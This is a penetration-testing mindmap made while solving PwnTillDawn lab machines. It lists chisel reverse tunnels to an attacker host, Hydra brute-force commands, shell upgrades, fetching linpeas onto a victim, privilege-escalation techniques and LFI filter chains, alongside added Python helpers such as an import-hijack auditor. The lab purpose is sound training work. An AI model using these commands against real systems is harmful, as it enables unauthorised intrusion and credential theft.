
By Anthony Guilbert, 6 hours ago.


Pwntilldawn Mindmap FULL

A mindmap covering various aspects of cybersecurity and penetration-testing tools: pivoting and port forwarding, Nmap network scanning (with specific command options and automation scripts), enumeration of common services, privilege escalation, web enumeration and steganography.


Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding
If we have SSH access:

sshuttle -r user@ip -N

(-N auto-detects the subnets reachable from the SSH host; give them explicitly, e.g. 10.150.150.0/24, if auto-detection picks the wrong ones)

Web service listening only on the victim's localhost

On the victim:

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Don't forget to adapt port 8080 to the situation. R:8080:127.0.0.1:8080 is a reverse forward: port 8080 on the attacker host is tunneled to 127.0.0.1:8080 on the victim.

On the attacker host (start this first, the client needs something to connect to):

chisel server -port 7777 --reverse

Check what is listening on localhost on the victim (netstat -antup, see Misc) to know which port to forward
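Once the reverse forward is up, it is worth confirming that the attacker-side port really reaches the victim's local web service instead of trusting chisel's log line. The probe below is an added example and not part of the mindmap: it opens a TCP connection, sends a HEAD request and returns the HTTP status line, or None when nothing (or nothing speaking HTTP) answers. The target 127.0.0.1:8080 is an assumption matching the chisel command above; demo_local() stands up a throwaway HTTP server on a random loopback port so the check can be exercised without a real pivot.

```python
#!/usr/bin/env python3
"""Confirm that a forwarded port actually reaches an HTTP service.

Added example: after `chisel client ip_host:7777 R:8080:127.0.0.1:8080`
the attacker host should have 127.0.0.1:8080 answering like the victim's
local web service. This probe makes that check explicit.
"""
import http.server
import socket
import threading


def probe_http(host: str, port: int, path: str = "/", timeout: float = 3.0):
    """Return the HTTP status line served at host:port, or None.

    None covers both 'nothing listening' (connection refused, i.e. the
    forward is not up) and 'something listening that is not HTTP'.
    """
    request = f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            data = sock.recv(1024)
    except OSError:
        return None
    status_line = data.split(b"\r\n", 1)[0]
    if not status_line.startswith(b"HTTP/"):
        return None
    return status_line.decode("ascii", errors="replace")


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    """Stand-in for the victim's web app (demo only); silences per-request logging."""

    def log_message(self, fmt, *args):
        pass


def demo_local():
    """Exercise probe_http against a throwaway local server (constructed for the demo).

    Returns (status line from the live port, result from a port with no listener).
    """
    server = http.server.HTTPServer(("127.0.0.1", 0), _QuietHandler)
    live_port = server.server_address[1]
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        live = probe_http("127.0.0.1", live_port)
    finally:
        server.shutdown()
        server.server_close()

    # Grab a free port and release it again so that nothing listens there.
    with socket.socket() as tmp:
        tmp.bind(("127.0.0.1", 0))
        dead_port = tmp.getsockname()[1]
    dead = probe_http("127.0.0.1", dead_port)
    return live, dead


if __name__ == "__main__":
    # Assumed forward from the chisel command above; adapt the port to the target.
    print(probe_http("127.0.0.1", 8080))
```

A None result right after starting the chisel client usually means the server side was started without --reverse, or the victim service is bound to a port other than the one given in R:.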

NMAP

Nmap Automator
nmap -sV -sC -T5 -p- ip
nmap -sV -Pn -p- -T5 ip
sudo nmap -sF -p1-100 -T4 ip

-Pn skips host discovery (use it when ping is blocked and the host shows as down). -T5 is fast but drops probes under load, so re-scan interesting ports at -T4 if results look incomplete. -sF (FIN scan) needs raw sockets, hence sudo.
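The usual way to automate this is in two phases: a fast full-port sweep, then -sV -sC only on the ports found open, which is much quicker than running scripts against all 65535 ports at -T5. The script below is an added example written for this page, not the "Nmap Automator" tool the mindmap refers to. It parses Nmap's greppable (-oG) output; SAMPLE_GREPABLE is a constructed sample in that format (the host 10.150.150.57 is the one from the DNS example), and the -T4/--min-rate choices are the author's, not the mindmap's.

```python
#!/usr/bin/env python3
"""Two-phase Nmap automation (added example).

Phase 1 sweeps all TCP ports quickly and records only open ones;
phase 2 runs the slow -sV -sC probes on exactly those ports.
"""
import re
import shlex
import subprocess

# One "<port>/open/<proto>//<service>///" token in greppable (-oG) output.
_OPEN_PORT = re.compile(r"(\d+)/open/(tcp|udp)")

# Constructed sample of -oG output, the shape produced by phase1_cmd().
SAMPLE_GREPABLE = (
    "# Nmap 7.94 scan initiated\n"
    "Host: 10.150.150.57 ()\tStatus: Up\n"
    "Host: 10.150.150.57 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "443/closed/tcp//https///\tIgnored State: filtered (65532)\n"
    "# Nmap done: 1 IP address (1 host up) scanned\n"
)


def phase1_cmd(target: str) -> list:
    """Fast full-port sweep; --open keeps the output to what we care about."""
    return ["nmap", "-p-", "-T4", "--min-rate", "1000", "--open", "-oG", "-", target]


def parse_open_ports(grepable: str) -> dict:
    """Map each host to the sorted list of its open ports from -oG text."""
    open_ports = {}
    for line in grepable.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        ports = {int(m.group(1)) for m in _OPEN_PORT.finditer(ports_field)}
        if ports:
            open_ports[host] = sorted(set(open_ports.get(host, [])) | ports)
    return open_ports


def phase2_cmd(host: str, ports: list) -> list:
    """Version/script scan restricted to the ports phase 1 found open."""
    return ["nmap", "-sV", "-sC", "-p", ",".join(str(p) for p in ports), host]


def scan(target: str) -> dict:
    """Run both phases; needs nmap installed (and root for a SYN sweep)."""
    sweep = subprocess.run(phase1_cmd(target), capture_output=True, text=True, check=True)
    found = parse_open_ports(sweep.stdout)
    for host, ports in found.items():
        cmd = phase2_cmd(host, ports)
        print("[*] " + shlex.join(cmd))
        subprocess.run(cmd, check=False)
    return found


if __name__ == "__main__":
    import sys
    scan(sys.argv[1])
```

Closed and filtered entries are deliberately ignored by the regex, so only the open ports reach the second phase; if phase 1 finds nothing on a host that is clearly up, add -Pn to phase1_cmd as in the second mindmap command.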

Miscellaneous protocols

DNS
! AXFR ! (try a zone transfer: it only works if the server allows AXFR to anyone, but then it lists every host in the zone)

dig @mortysserver.com mortysserver.com axfr

Add the results to /etc/hosts if needed

Example: 10.150.150.57 rickscontrolpanel.mortysserver.com
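A successful transfer can return dozens of records, and the useful step is turning them into /etc/hosts lines like the example above. The script below is an added example, not from the mindmap: it parses the text dig prints for an AXFR, keeps A records, follows CNAMEs one hop into the zone's own A records, and groups every name by address. SAMPLE_AXFR is a constructed sample in dig's output format whose record data (serial, TTLs, the ns1 and www names) is made up; only rickscontrolpanel.mortysserver.com / 10.150.150.57 comes from the page.

```python
#!/usr/bin/env python3
"""Turn a zone transfer into /etc/hosts entries (added example).

Input is the text printed by `dig @mortysserver.com mortysserver.com axfr`;
output is one line per IP listing every name that resolves to it. Names that
only appear in SOA/NS/MX data are skipped because they carry no address.
"""

# Constructed sample of dig's AXFR output (record data is made up).
SAMPLE_AXFR = """\
; <<>> DiG 9.18.12 <<>> @mortysserver.com mortysserver.com axfr
;; global options: +cmd
mortysserver.com.\t3600\tIN\tSOA\tns1.mortysserver.com. admin.mortysserver.com. 2023 3600 600 86400 3600
mortysserver.com.\t3600\tIN\tNS\tns1.mortysserver.com.
ns1.mortysserver.com.\t3600\tIN\tA\t10.150.150.57
rickscontrolpanel.mortysserver.com.\t3600\tIN\tA\t10.150.150.57
www.mortysserver.com.\t3600\tIN\tCNAME\trickscontrolpanel.mortysserver.com.
mortysserver.com.\t3600\tIN\tSOA\tns1.mortysserver.com. admin.mortysserver.com. 2023 3600 600 86400 3600
;; Query time: 3 msec
"""


def parse_axfr(dig_output: str):
    """Return (a_records, cnames): fqdn -> IPv4 and alias -> canonical name."""
    a_records, cnames = {}, {}
    for line in dig_output.splitlines():
        if not line or line.startswith(";"):
            continue
        fields = line.split()
        # Layout of a record line: name  ttl  class  type  rdata...
        if len(fields) < 5 or fields[2] != "IN":
            continue
        name, rtype, rdata = fields[0].rstrip("."), fields[3], fields[4].rstrip(".")
        if rtype == "A":
            a_records[name] = rdata
        elif rtype == "CNAME":
            cnames[name] = rdata
    return a_records, cnames


def hosts_lines(dig_output: str) -> list:
    """Group names by address; CNAMEs are followed one hop into the zone's A records."""
    a_records, cnames = parse_axfr(dig_output)
    by_ip = {}
    for name, ip in a_records.items():
        by_ip.setdefault(ip, []).append(name)
    for alias, target in cnames.items():
        if target in a_records:
            by_ip[a_records[target]].append(alias)
    return [f"{ip} {' '.join(names)}" for ip, names in by_ip.items()]


if __name__ == "__main__":
    import sys
    # dig @mortysserver.com mortysserver.com axfr | python3 axfr2hosts.py | sudo tee -a /etc/hosts
    print("\n".join(hosts_lines(sys.stdin.read())))
```

Every name ends up on the line of its address, so a virtual host such as rickscontrolpanel.mortysserver.com is reachable by name in the browser even when the web server only answers to that Host header.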

SSH
Try to connect to grab the banner (version)
Connect if we have the private key (chmod 600 id_rsa first, otherwise ssh refuses the key)

ssh -i id_rsa user@ip

POP3
hydra -l operator -P wordlist.txt ip pop3
MySQL
mysql -h localhost -u sql_user -p
(with -h localhost the client goes through the Unix socket; use -h 127.0.0.1 to force TCP)
mysqldump -u root -p --all-databases > alldb.sql
FTP
Check for anonymous login
NFS
showmount -e IP
rpcinfo IP
sudo mount -t nfs ip:/remote /local
sudo umount 10.150.150.59:/nfsroot
SMTP
hydra -l operator -P wordlist.txt ip smtp
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup
Dumb shell upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash
(then background the shell with Ctrl-Z, put the local terminal in raw mode without echo using stty, foreground the shell again and set TERM to get tab completion and a Ctrl-C that does not kill the connection)
If errors are needed but not displayed (e.g. a PHP webshell):
append "2>file" to the command

then cat the file

Find files

Windows

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"

Linux
Other

grep -r pattern

search in files recursively (-r)

Find

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find ./* | grep FLAG3

find / \( -name ".env" -o -name ".git" \) 2>/dev/null

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

(2>/dev/null hides the "Permission denied" noise from directories we cannot read)

Privesc

SUID
find / -perm -u=s -type f 2>/dev/null
searchsploit
searchsploit -m path (mirror the exploit into the current directory)
searchsploit <keyword>
Python Library Hijacking
A script that runs as root and imports libraries: if a directory searched before the real module, or the module file itself, is writable by us, our own module gets imported in its place
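Python resolves `import foo` by taking the first match while walking sys.path in order, and sys.path[0] is the directory of the script being run, so the places to check are every directory searched before the real module plus the module file itself. The audit below is an added example, not from the mindmap: given a script, it lists its top-level imports and, for each one, the writable locations where a module would be picked up first. The demo() scenario (a job/backup.py importing helper from a separate lib directory, both inside a temporary directory) is constructed for illustration.

```python
#!/usr/bin/env python3
"""Where could an import in a root-run script be hijacked? (added example)

For `import helper` in /opt/job/backup.py, a writable /opt/job/helper.py wins
over the real helper because the script's directory is searched first; if the
real helper.py is writable, editing it works as well. Modules the interpreter
already loaded at startup (os, sys, ...) cannot be shadowed this way.
"""
import ast
import os
import sys
import tempfile


def find_module(module: str, search_path: list):
    """First-match resolution of a top-level module: (index in search_path, file) or (None, None)."""
    for idx, directory in enumerate(search_path):
        base = directory or os.getcwd()  # '' in sys.path means the current directory
        for candidate in (os.path.join(base, module + ".py"),
                          os.path.join(base, module, "__init__.py")):
            if os.path.isfile(candidate):
                return idx, candidate
    return None, None


def hijack_points(module: str, search_path: list) -> list:
    """Paths we could write that would be imported instead of (or as) the real module."""
    idx, real = find_module(module, search_path)
    searched_first = search_path if idx is None else search_path[:idx]
    points = [os.path.join(d or os.getcwd(), module + ".py")
              for d in searched_first if os.access(d or os.getcwd(), os.W_OK)]
    if real and os.access(real, os.W_OK):
        points.append(real)
    return points


def imported_modules(script_path: str) -> list:
    """Top-level module names imported anywhere in the script (`import a.b`, `from a import b`)."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def audit(script_path: str, search_path=None) -> dict:
    """Map each imported module of script_path to its hijack points.

    search_path defaults to what `python3 script_path` would use: the script's
    own directory first, then the interpreter's sys.path (PYTHONPATH included).
    """
    if search_path is None:
        search_path = [os.path.dirname(os.path.abspath(script_path))] + sys.path[1:]
    return {m: hijack_points(m, search_path) for m in imported_modules(script_path)}


def demo() -> dict:
    """Constructed scenario: the 'root' script's own (writable) directory is searched
    before the lib directory that holds the real helper module."""
    with tempfile.TemporaryDirectory() as top:
        script_dir = os.path.join(top, "job")
        lib_dir = os.path.join(top, "lib")
        os.makedirs(script_dir)
        os.makedirs(lib_dir)
        with open(os.path.join(lib_dir, "helper.py"), "w") as fh:
            fh.write("def run(): pass\n")
        script = os.path.join(script_dir, "backup.py")
        with open(script, "w") as fh:
            fh.write("import helper\nfrom helper import run\nrun()\n")
        result = audit(script, [script_dir, lib_dir])
        # Relative to the temp dir so the result is stable across machines.
        return {m: [os.path.relpath(p, top) for p in paths] for m, paths in result.items()}


if __name__ == "__main__":
    for module, points in audit(sys.argv[1]).items():
        print(f"{module}: {points or 'no writable location'}")
```

Run it against the root-executed script found via cron or sudo -l; any listed path is where a module carrying the payload (a shell, a copy of /bin/bash made SUID, etc.) would be loaded the next time the script runs.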
LXC/LXD (requires membership of the lxd group)
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
Metasploit
Upgrade session: sessions -u
Windows
Shell

Upgrade shell (to meterpreter)

sessions -u id

ps --> migrate pid

msfconsole

post/multi/recon/local_exploit_suggester

linpeas
On the attacker: sudo python3 -m http.server port, then wget it from the victim
Symbolic link
ln -s /root /home/michael/importantfiles/rootbackup
(if a root-owned job archives or copies that directory, the symlink makes it process /root instead)

WEB

Wordpress
Bruteforce

wpscan --url url_wordpress --passwords wordlist

User enumeration

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u
Check for vulnerable themes and plugins

wpscan --url url --enumerate vp,vt

(vp/vt only report vulnerabilities with a WPScan API token, --api-token; without one you still get the plugin/theme list and versions)

PHP Filters
python3 php_filter_chain_generator.py --chain ''

(the --chain argument is the PHP code to execute; the tool outputs a php://filter chain that turns an include of attacker-controlled input (LFI) into that code)

https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py

Enumeration
Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k for a self-signed certificate

Bruteforce Forms
Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

(the last field is the text shown on a failed login; hydra treats any response without it as a success, so copy it from a real failed attempt)

hydra -l operator -P wordlist.txt 10.150.150.56
(add the service after the IP, as in the pop3 and smtp lines)

Stegano

searchsploit
Depixelize
Unredactor
Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram
https://piellardj.github.io/stereogram-solver/
Aperisolve
Steghide
steghide extract -sf screen.jpeg
(prompts for the passphrase; try an empty one first)